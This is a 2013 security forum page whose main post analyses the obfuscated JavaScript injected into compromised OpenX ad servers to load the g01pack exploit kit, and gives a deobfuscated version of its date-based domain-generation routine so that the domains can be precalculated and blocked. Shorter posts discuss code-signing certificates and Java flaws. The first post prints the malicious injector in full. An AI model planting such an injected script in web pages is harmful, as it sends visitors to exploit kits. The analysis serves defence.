Recent Posts

92

Malware Analysis / Precalculating Dyndns domain names of g01pack exploit kit

« Last post by SysAdMini on March 12, 2013, 10:20:57 pm »

If you follow us on Twitter, you have probably seen our tweets about compromised OpenX servers leading to g01pack exploit kit.

g01pack has been using a signed Java applet for a few days. Eric Romang published an article about it.

I see compromised OpenX servers leading to g01pack daily. Added Javascript code creates an iframe leading to a DynDNS domain.
Domain names change frequently.

Code on compromised OpenX servers is heavily obfuscated. Here is an example :

Code: [Select]

var OX_e092ce8f = '';
OX_e092ce8f += "<"+"script type=\'text/javascript\'>var _C;if(_C!=\"B_F\"){_C=\"B_F\"};var NE=\"MS\";this.YM=\"YM\";DC=[\"WKH\",\"QV\"];IMF=[\"BD\",\"nOZ\",\"x$\"];var N$=\"PX\";this.SQ=\"SQ\";lVA=[];var IK$ATY;var qD;if(qD!=\"\"&&qD!=\"WM\"){qD=null};var lK;if(lK!=\"\"&&lK!=\"GL\"){lK=null};IK$ATY=function(){function n(){q=_(\'q\');Y=h(W(\"4&Bm\"));T=new Y();T=T[q]();b=u(664653,1000);b=t(T,b);return b;};function yF(nP,nZ,sO){rI=RH();tG=K(MT,rI);$S=_(\'$S\');JOC=_(\'JOC\');xA=_(\'xA\');IS=_(\'IS\');xG=_(\'xG\');sB=_(\'sB\');JJ=_(\'JJ\');hY=_(\'hY\');iG=_(\'iG\');HUG=l[$S];Y=h(W(\"4&Bm\"));sO=new Y(sO);sO=sO[iG]();ZG=K(nP,JOC,nZ,JJ,sO,hY,xG,sB,tG);l[$S]=ZG;};function S$(gY,NV){Y=h(W(\"4&Bm\"));DY=_(\'DY\');IS=_(\'IS\');g=1;TJ=5;zT=new Y();tG=_(\'mD\');UV=W(\"&(CWrC(iC(ummQCr}C6CirC*mCQ&C&C}CaCB61CB}CrC-Ca&ppCW(CU-1CZCtC}pQCYC?C-}UC6iCiCrmBCBCt}CBWC-}(BC}rC&QCu}6B&pCr&C}6Qm6C%C&(tCpC(CQCu}Ca&BC5}6C*C}55C}UrCmC5CuCpmCi(\");UV=UV[DY](IS);zI=_(\'zI\');hG=t(zI,_(\'DD\'));DT=t(zI,_(\'lT\'));LI=t(zI,_(\'ZI\'));mE=t(zI,_(\'HU\'));OG=uP(zT[hG]());fG=zT[DT]();tM=zT[LI]();yN=zT[mE]();PT=fT(gY,OG);RV=fT(NV,OG);JS=U(UV);JH=OG;dY=K(OG,fG);YS=K(OG,fG,tM);NO=K(OG,fG,tM,yN);o=aB(JH,JS);J=aB(dY,JS);KH=aB(YS,JS);VY=aB(NO,JS);J=gM(J,o,g,JS);KH=gM(KH,J,g,JS);VY=gM(VY,KH,g,JS);tG=t(tG,PT);tG=t(tG,YX(UV,o));tG=t(tG,YX(UV,J));tG=t(tG,YX(UV,KH));tG=t(tG,YX(UV,VY));;tG=t(tG,RV);return tG;};function RH(){qR=_(\'qR\');BE=_(\'BE\');DY=_(\'DY\');MT=_(\'MT\');g=1;EIS=2;Z=m();rI=l[BE][qR];rI=rI[DY](MT);OY=U(rI);JH=fO(OY,g);dY=fO(OY,EIS);pV=Z;pV=K(rI[dY],MT,rI[JH]);return pV;};function oT(){IY=this;return IY;};function fT(BY,OG){dR=_(\'mD\');try{pL=U(BY);BIY=aB(OG,pL);dR=BY[BIY];}catch(IE){}return dR;};function W(y){Z=m();if(y==Z)return y;H=\'WIl*1C46rkzp\'+v(\'boS5>KXw<"+"N_qu]BboS\',3,12)+v(\'3 bQ,$h%FmnVHvRx\',0,12)+\'Od[oGav.UexE\'+v(\'Y^-=)L}JcfTtANF\',0,12)+v(\'/:&jiHZRyP|A8T2\',0,12)+v(\'{7;2gsMD0?(#o5V\',0,12)+\'S89\';j=v(\'uW%my DrnL?l9NTv\',0,12)+v(\'ry9nf2C-RP[vMpKtny9r\',4,12)+v(\':Z=dQ|Vb)e}8xRXu\',0,12)+v(\'HYXA5SI]$c>6wU4GAHXY\',4,12)+\'j*hEJ7o#Xx0k\'+v(\'sKwM^1aziAq/OBY<"+"KMsw\',4,12)+v(\'8kO(&{,3HFNTgs9O8k\',3,12)+\'_;.\';F=\'indexOf\';k=\'subst\'+v(\'r6MDe\',0,1);E=0;g=1;x=Z;for(A=E;A<"+"U(y);A++){o=y[k](A,g);z=H[F](o);if(z>-1){J=j[k](z,g);x=t(x,J);}}return x;};function u(ZZ,gZ){pV=ZZ*gZ;return pV;};function oS(){SB=h(W(\"r&_i?&B}6\"));IG=h(W(\"HaBi_mcy%YmaB\"));YY=h(W(\"cqksBBuwmZWm(B\"));SG=c(W(\"{M56m5}f$K-6}*m$kirWf$q&aCydF\"),m());WU=_(\'WU\');i=_(\'i\');dS=_(W(\"Qd\"));GB=SB[dS];pV=(typeof IG!=WU||typeof YY!=WU)&&!SG[i](GB);return pV;};function L(){WW=oT();HK=_(\'HK\');return WW[HK];};function _(VD){var GA={vY:W(\"wm?=fu\"),HK:W(\"Q}aW*mrB\"),mD:m(),WU:W(\"WrQm5irmQ\"),i:W(\"Bm(B\"),dS:W(\"W(m6H?mrB\"),vWU:W(\"*&Ba-\"),$S:W(\"a}}tim\"),hQ:W(\"(6a\"),jG:W(\"-BBu3RR\"),zI:W(\"?mBe0K\"),DD:W(\"s}W6(\"),lT:W(\"4&Bm\"),ZI:W(\"q}rB-\"),HU:W(\"MWpp|m&6\"),iG:W(\"B}Eq0dB6ir?\"),q:W(\"?mB0i*m\"),lU:W(\"A%}Q1v\"),iN:W(\"i56&*m\"),HV:W(\"u}(iBi}r\"),eH:W(\"&%(}pWBm\"),iA:W(\"B}u\"),wL:W(\"pm5B\"),mF:W(\"RrmU(R\"),F:W(\"irQmfy5\"),OOS:W(\"6mup&am\"),k:W(\"(W%(B6\"),DY:W(\"(upiB\"),xF:W(\"B}k}Um6K&(m\"),rW:W(\"a-&6HB\"),_F:W(\"%}Q1\"),BE:W(\"p}a&Bi}r\"),qR:W(\"-}(B\"),FD:W(\"&uumrQK-ipQ\"),qV:W(\"a6m&Bm=pm*mrB\"),aL:W(\"U6iBm\"),DH:W(\"m_&p\"),XL:W(\"(B1pm\"),oC:W(\"UiQB-\"),$I:W(\"-mi?-B\"),XD:W(\"?mB=pm*mrBP1[Q\"),e$:W(\"iQ\"),YF:W(\"5p}}6\"),kA:W(\"6&rQ}*\"),Q:W(\"&6?W*mrB(\"),JJ:W(\"8Cmfui6m(b\"),hY:W(\"8Cu&B-b\"),sB:W(\"8CQ}*&irb\"),IS:W(\"C\"),aU:\'\\\\\',xG:W(\"R\"),JOC:W(\"b\"),fL:W(\"S\"),MT:W(\"9\"),xA:W(\"8\"),EZ:W(\"2\")};pV=N();LJ=false;for(A in GA){if(A==VD){pV=GA[A];LJ=true;break;}}return pV;};function KMF(D,A){var rW=_(\'rW\');return D[rW](A);};function XW(ZG,nZ){$S=_(\'$S\');F=_(\'F\');JOC=_(\'JOC\');kI=-1;HUG=l[$S];pV=false;if(U(HUG)>0){DX=K(ZG,JOC,nZ);pV=HUG[F](DX)!=kI;}return pV;};function X(){V=\'f\';if(h(\'e\')==V){return false;}d(\'e\',V);try{l=L();I=$();if(S(I)){return false;}if(B()){return false;}var r=O();P=m();C=1;pD=WV();gY=r.gY;NV=r.NV;gK=XW(pD,C);if(!gK){oS=oS();if(oS){tG=S$(gY,NV);JM=pW();eO=_(\'hQ\');nN=_(\'jG\');ZF=_(\'mF\');P=K(nN,tG,ZF);JM[eO]=P;jC=n();yF(pD,C,jC);};};}catch(IE){};};function c(bP,JZ){TV=h(W(\"wm?=fu\"));aU=\'\\\\\';bP=ZY(bP,W(\"SSdkHdsSS\"),aU);IY=new TV(bP,JZ);return IY;};function O(){return{gY:YN(W(\"\")),NV:YN(W(\"9Q}m(rBmfi(B9a}*29Qr(&pi&(9a}*29Q1r&pi&(9a}*\")),RB:YN(W(\"(:\"))};};function S(I){XD=_(\'XD\');uQ=l[XD](I);return uQ;};function N(){return null;};function fO(ZZ,gZ){pV=ZZ-gZ;return pV;};function h(IB){WW=oT();IY=WW[IB];return IY;};X();function WV(){Z=m();BE=_(\'BE\');qR=_(\'qR\');OOS=_(\'OOS\');QM=c(W(\"N/&XjTX#So\"),W(\"?i\"));mF=_(\'mF\');fL=_(\'fL\');rI=l[BE][qR];$N=RH();$N=K($N,fL,mF);$N=$N[OOS](QM,Z);return $N;};function ZY(y,DX,QU){F=\'inde\'+v(\'xOf0C8r\',0,3);OOS=v(\'replaceTIo\',0,7);while(y[F](DX)>=0)y=y[OOS](DX,QU);return y;};function aB(ZZ,gZ){pV=ZZ%gZ;return pV;};function U(D){return D.length;};function uP(D){SI=h(W(\"q&B-\"));YF=_(\'YF\');return SI[YF](D);};function YN(D){var DY=_(\'DY\');var OZ=_(\'EZ\');return D[DY](OZ);};function QS(){SI=h(W(\"q&B-\"));kA=_(\'kA\');return SI[kA]();};function YX(OD,A){return OD[A];};var l=N();function gM(UG,RL,gM,JR){if(UG==RL){UG=t(UG,gM);UG=aB(UG,JR);}return UG;};function K(){Q=_(\'Q\');w=K[Q];E=0;M=w[E];if(typeof(M)==W(\"rW*%m6\"))x=E;else x=m();for(var A=E;A<"+"U(w);A++)x=t(x,w[A]);return x;};function pW(){qV=_(\'qV\');FD=_(\'FD\');iN=_(\'iN\');HV=_(\'HV\');eH=_(\'eH\');_F=_(\'_F\');lU=_(\'lU\');aL=_(\'aL\');oC=_(\'oC\');$I=_(\'$I\');iA=_(\'iA\');wL=_(\'wL\');XL=_(\'XL\');e$=_(\'e$\');I=$();uQ=l[qV](iN);uQ[e$]=I;wX=W(\":>Tuf\");hDD=W(\"X>T:uf\");uQ[XL][oC]=wX;uQ[XL][$I]=wX;uQ[XL][iA]=hDD;uQ[XL][wL]=hDD;uQ[XL][HV]=eH;try{l[_F][FD](uQ);}catch(IE){try{l[aL](lU);l[_F][FD](uQ);}catch(zO){};};return uQ;};function d(IB,nZ){WW=oT();WW[IB]=nZ;};function t(D,HY){pV=D+HY;return pV;};function B(){s=c(W(\"SSdkHdsSSFSSdkHdsSS(^SSdkHdsSS;SSdkHdsSS(^SSdkHdsSSNSSdkHdsSS(^r&Bi_mSSdkHdsSS(^a}QmSSdkHdsSS(^SSdkHdsSSoSSdkHdsSS(^SSdkHdsSSnSSdkHdsSS(^G\"),W(\"?i\"));i=_(\'i\');G=h(W(\"m_&p\"));a=!s[i](G);x=false;R=true;if(a)x=R;return x;};function $(){I=K(\'iZ\',\'NA\',\'UB\');return I;};function v(D,A,p){return D.substr(A,p);};function m(){return\'\';};};this.vB=\"\";this.DZ=3900;this.DZ++;var JKH={iGW:false};LZ=63678;LZ+=71;IK$ATY();<"+"/script><"+"SCRIPT LANGUAGE=\"JavaScript\">\n";
OX_e092ce8f += "<"+"!-- Hide from old browsers\n";
OX_e092ce8f += "// Modify to reflect site specifics\n";
OX_e092ce8f += "adserver = \"http://ads.quartermedia.de/quartermedia\";\n";
OX_e092ce8f += "target = \"/site=HANDYMC.DE/area=CT_HANDYMC_WALLPAPER/size=728x90\";\n";
OX_e092ce8f += "// Cache-busting and pageid values\n";
OX_e092ce8f += "random = Math.round(Math.random() * 100000000);\n";
OX_e092ce8f += "if (!pageNum) var pageNum = Math.round(Math.random() * 100000000);\n";
OX_e092ce8f += "document.write(\'<"+"SCR\');\n";
OX_e092ce8f += "document.write(\'IPT SRC=\"\' + adserver + \'/jserver/random=\' + random + target + \"/viewid=\" + pageNum + \'\">\');\n";
OX_e092ce8f += "document.write(\'<"+"/SCR\');\n";
OX_e092ce8f += "document.write(\'IPT>\');\n";
OX_e092ce8f += "// End Hide -->\n";
OX_e092ce8f += "<"+"/SCRIPT><"+"div id=\'beacon_e0670946aa\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www2.handy-mc.de/www/delivery/lg.php?bannerid=12&amp;campaignid=8&amp;zoneid=1&amp;loc=1&amp;referer=http%3A%2F%2Fwww.handy-mc.de%2F&amp;cb=e0670946aa\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"script type=\'text/javascript\'>document.context=\'YjoxMnxwOjg=\'; <"+"/script>\n";
document.write(OX_e092ce8f);

if (document.OA_used) document.OA__used += 'bannerid:12,';

if (document.MAX_used) document.MAX_used += 'bannerid:12,';

if (document.phpAds_used) document.phpAds_used += 'bannerid:12,';

I was wondering how it works and checked it in debugger.
Here is conversion of the most important function into readable code.

Code: [Select]

<head> 
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> 
<meta http-equiv="language" content="en"/>
<head>
<body>
<script type="text/javascript">
gY=[""];
NV=[".doesntexist.com",".dnsalias.com",".dynalias.com"];
g = 1;
TJ = 5;
zT = new Date();
tG="";
UV="as un si speed no r in me da a o c try to n h call us why q k old j g how ri i net t ko tu host on ad portal na order b ask l s d po cat for m off own e f p le is"
UV=UV.split(" ");
OG=Math.floor(zT.getUTCHours());
fG=zT.getUTCDate();
tM=zT.getUTCMonth();
yN=zT.getUTCFullYear();
PT=gY[OG % gY.length];
RV=NV[OG % NV.length];
JS=UV.length;
JH=OG;
dY=OG+fG;
YS=OG+fG+tM;
NO=OG+fG+tM+yN;
o=JH % JS;
J= dY % JS;
KH=YS % JS;
VY=NO % JS;
if (J == o) {
 J = J + g;
 J = J % JS;
}
if (KH == J) {
 KH = KH + g;
 KH = KH % JS;
}
if (VY == KH) {
 VY = VY + g;
 VY = VY % JS;
}
tG=tG+PT;
tG=tG+UV[o];
tG=tG+UV[J];
tG=tG+UV[KH];
tG=tG+UV[VY];
tG=tG+RV;
document.write("hxxp://"+tG+"/news/");
</script>
</body>

Script calculates the current exploit kit url based on current date and hour. You can save the script as html file and run it in your browser.

It's up to you to add a loop for precalculating a list of all future domain names. Maybe some of you has a good contact at Dyndns and can forward a list to those guys for blocking.

94

Tools of the trade / Internet News / Re: When a Signed Java JAR file is not Proof of Trust

« Last post by dlipman on March 06, 2013, 02:25:25 pm »

I guess they do.

http://www.godaddy.com/ssl/code-signing-certificate.aspx

I hope its not like Comodo. I remember a time when we had to have Kishor revoke Comodo certificates used with malware.

96

Tools of the trade / Internet News / Re: When a Signed Java JAR file is not Proof of Trust

« Last post by dlipman on March 05, 2013, 09:55:21 pm »

I didn't know GoDaddy was a CA.

98

Site / Forum Discussion / Spuninst.exe

« Last post by walterab on March 05, 2013, 12:47:51 pm »

One of the members of my white paper forum wrote me that his computer pastes "Spuninst.exe" all over his files. Anyone out there with recent experience with this virus?

100

Tools of the trade / Internet News / Re: ALERT: Yet another Java 0day

« Last post by SysAdMini on March 01, 2013, 01:54:55 pm »

JavaRA looks interesting.

Do you know if it can be run from command line ? Would be nice for a company environment.

Recent Posts

Malware Analysis / Re: Precalculating Dyndns domain names of g01pack exploit kit

Malware Analysis / Precalculating Dyndns domain names of g01pack exploit kit

Malware Analysis / Reversing BHEK2 Java archives using Python

Tools of the trade / Internet News / Re: When a Signed Java JAR file is not Proof of Trust

Tools of the trade / Internet News / Re: When a Signed Java JAR file is not Proof of Trust

Tools of the trade / Internet News / Re: When a Signed Java JAR file is not Proof of Trust

Tools of the trade / Internet News / When a Signed Java JAR file is not Proof of Trust

Site / Forum Discussion / Spuninst.exe

Tools of the trade / Internet News / Re: ALERT: Yet another Java 0day

Tools of the trade / Internet News / Re: ALERT: Yet another Java 0day